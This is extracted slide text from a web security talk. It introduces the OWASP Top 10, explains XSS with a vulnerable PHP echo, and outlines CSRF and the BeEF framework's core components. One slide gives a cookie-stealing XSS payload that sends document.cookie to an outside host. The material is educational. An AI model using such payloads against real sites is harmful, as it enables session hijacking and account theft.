37. So just how bad is the
bad stuff the bad
people do?
37
38. 38
OWASP, the Open Web Application Security Project, try to categorise the top 10 riskiest web
security weaknesses.
Known as the OWASP Top 10 it’s a great resource..
www.owasp.org
39. Cross Site Scripting
(XSS)
39
In the OWASP Top 10 this comes in at number 2, and they describe it as so:
“XSS flaws occur when an application includes user supplied data in a page sent to the
browser without properly validating or escaping that content”
40. Server code:
1. Take ‘greeting’ parameter
page.php?greeting=<input>
2. Dynamically print that out in the response
<p><?php echo $_GET[‘greeting’] ?></p>
40
41. What if greeting was:
<script>img=new Image();img.src='http://
frichot.com/nom.php?
cookie='+document.cookie;</script>
41
45. Cross Site Request Forgery
(CSRF)
45
CSRF comes in at number 5 in the OWASP Top 10.. described as:
“Since browsers send credentials like session cookies automatically, attackers can create
malicious web pages which generate forged requests that are indistinguishable from
legitimate ones.”
53. GET request to Add New Contact page
POST request to add the contact
POST request to confirm the new contact
POST request to create payment to contact
POST request to confirm payment
53
60. 60
Beef is currently made up of 3 main components:
Core, Extensions & Modules
http://img4.cookinglight.com/i/2009/01/0901p40f-beef-patty-m.jpg?
300:300
61. 61
Firstly is the core..
http://www.imdb.com/media/rm1627756544/tt0298814
62. Hooking methods
Central API for Extensions & Modules
Filters Database models
CORE
Primary client-
Ruby extensions
side JS
Server-side asset handling Web servicing
62
! - The Core
! ! - Central API
! ! - Filters
! ! - Primary client-side javascript
! ! - Server-side asset handling and web servicing
! ! - Ruby extensions
! ! - Database models
! ! - Hooking methods to load and manage arbitrary extensions
and command modules